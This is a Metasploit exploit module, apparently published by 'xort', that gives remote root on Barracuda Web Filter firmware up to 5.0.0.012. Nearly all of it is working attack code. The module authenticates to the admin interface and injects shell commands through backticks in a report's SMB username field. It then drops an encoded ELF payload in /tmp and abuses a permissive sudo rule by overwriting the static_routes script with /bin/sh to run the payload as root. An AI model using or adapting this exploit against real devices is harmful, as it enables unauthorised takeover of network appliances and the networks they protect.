# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit # Exploit Author: xort # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/products/webfilter # Version: Firmware <= 5.0.0.012 # Tested on: Vx and Hardware platforms # # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating # capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain # root. xort@blacksecurity.org require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Barracuda Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration interface. By sending a specially crafted request it's possible to inject system commands while escalating to root do to relaxed sudo configuration on the local machine. }, 'Author' => [ 'xort', # metasploit module ], 'Version' => '$Revision: 12345 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Privileged' => false, 'Payload' => { # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('ET', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(8000), ], self.class) end def do_login(username, password, et) vprint_status( "Logging into machine with credentials...\n" ) # timeout timeout = 1550; # params password_clear = "admin" real_user = ""; login_state = "out" enc_key = Rex::Text.rand_text_hex(32) et = "1358817515" locale = "en_US" user = username password = Digest::MD5.hexdigest(username+enc_key) enctype = "MD5" password_entry = "" vprint_status( "Starting first routine...\n" ) data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login" vprint_status( "#{data}\n" ) res = send_request_cgi( { 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'cookie' => "", 'data' => data }, timeout) vprint_status( "login got code: #{res.code} ... continuing to second request..." ) File.open("/tmp/output2", 'w+') {|f| f.write(res.body) } # get rid of first yank password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] vprint_status( "password got back = #{password} - et got back = #{et}\n" ) return password, et end def run_command(username, password, et, cmd) vprint_status( "Running Command...\n" ) exploitreq = [ [ "primary_tab", "BASIC" ], [ "secondary_tab","reports" ], [ "realm","" ], [ "auth_type","Local" ], [ "user", username ], [ "password", password ], [ "et",et ], [ "role","" ], [ "locale","en_US" ], [ "q","" ], [ "UPDATE_new_report_time_frame","custom" ], [ "report_start","2013-01-25 01:14" ], [ "report_end","2013-01-25 02:14" ], [ "type","" ], [ "ntlm_server","" ], [ "kerb_server","" ], [ "local_group","changeme" ], [ "ip_group","20.20.108.0/0.0.0.0" ], [ "ip_address__0","" ], [ "ip_address__1","" ], [ "ip_address__2","" ], [ "ip_address__3","" ], [ "netmask__0","" ], [ "netmask__1","" ], [ "netmask__2","" ], [ "netmask__3","" ], [ "UPDATE_new_report_pattern_values","" ], [ "UPDATE_new_report_pattern_text","" ], [ "UPDATE_new_report_filter_destination","domain" ], [ "filter_domain","" ], [ "UPDATE_new_report_filter_domain","" ], [ "UPDATE_new_report_filter_category","" ], [ "UPDATE_new_report_exclude_from","" ], [ "UPDATE_new_report_exclude_to","" ], [ "UPDATE_new_report_exclude_days","" ], [ "allow","allow" ], [ "block","block" ], [ "warn","warn" ], [ "monitor","monitor" ], [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ], [ "UPDATE_new_report_filter_count","10" ], [ "UPDATE_new_report_chart_type","vbar" ], [ "UPDATE_new_report_format","html" ], [ "DEFAULT_new_report_group_expand","No" ], [ "UPDATE_new_report_expand_user_count","5" ], [ "UPDATE_new_report_expand_domain_count","5" ], [ "UPDATE_new_report_expand_cat_count","5" ], [ "UPDATE_new_report_expand_url_count","5" ], [ "UPDATE_new_report_expand_threat_count","5" ], [ "report","on" ], [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_report_id","" ], [ "UPDATE_new_report_enabled","Yes" ], [ "secondary_scope","report" ], [ "secondary_scope_data","" ], [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ], [ "UPDATE_new_report_delivery","external" ], [ "UPDATE_new_report_delivery_dest_email","" ], [ "UPDATE_new_report_server","new" ], [ "UPDATE_new_external_server_type","smb" ], [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_external_server","4.4.4.4" ], [ "UPDATE_new_external_server_port","445" ], [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ], [ "UPDATE_new_external_server_password","asdf" ], [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ], [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ], [ "add_report_id","Apply" ], [ "remover","" ] ] data = Rex::MIME::Message.new data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30) exploitreq.each do |xreq| data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"") end post_data = data.to_s post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------") datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0" vprint_status( "sending..." ) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'headers' => { 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language' => "en-US,en;q=0.5" } }) if res.code == 200 vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" ) vprint_status( "password: #{password} et: #{et}\n" ) end vprint_status( "login got code: #{res.code} from report_results.cgi\n" ) File.open("/tmp/output4", 'w+') {|f| f.write(res.body) } end def run_script(username, password, et, cmds) vprint_status( "running script...\n") end def exploit # timeout timeout = 1550; user = "admin" # params real_user = ""; login_state = "out" et = "1358817515" #epoch time locale = "en_US" user = "admin" password = "" enctype = "MD5" password_entry = "" password_clear = "admin" vprint_status("<- Encoding payload to elf string...") elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? password_clear = "admin" password = datastore['PASSWORD'] et = datastore['ET'] # else - if no 'CMD' string - add code for root shell else password, et = do_login(user, password, et) vprint_status("new password: #{password}\n") end sleep(5) if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] end run_command(user, password, et, cmd) # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm cmd = "echo -ne #{encoded_elf} > /tmp/x ;" cmd += "chmod +x /tmp/x ;" # backup static_routes file cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz" cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes" # execute elf as root cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;" # restore static_routes file cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes" run_command(user, password, et, cmd) sleep(2) handler sleep(5) end end